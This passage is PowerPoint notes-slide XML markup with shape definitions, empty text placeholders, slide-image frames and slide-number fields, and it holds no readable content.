      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="Shape 263"/>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68" name="Shape 268"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="Shape 269"/>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70" name="Shape 270"/>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Shape 271"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890836" cy="496887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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3" name="Shape 83"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Shape 84"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Shape 85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Shape 86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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76" name="Shape 276"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Shape 277"/>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78" name="Shape 278"/>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SzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Shape 279"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890836" cy="496887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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84" name="Shape 284"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Shape 285"/>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86" name="Shape 286"/>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SzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Shape 287"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890836" cy="496887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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92" name="Shape 292"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Shape 293"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="Shape 294"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Shape 295"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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00" name="Shape 300"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Shape 301"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Shape 302"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Shape 303"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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08" name="Shape 308"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Shape 309"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Shape 310"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Shape 311"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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16" name="Shape 316"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Shape 317"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="Shape 318"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Shape 319"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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25" name="Shape 325"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Shape 326"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Shape 327"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Shape 328"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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33" name="Shape 333"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Shape 334"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="Shape 335"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Shape 336"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
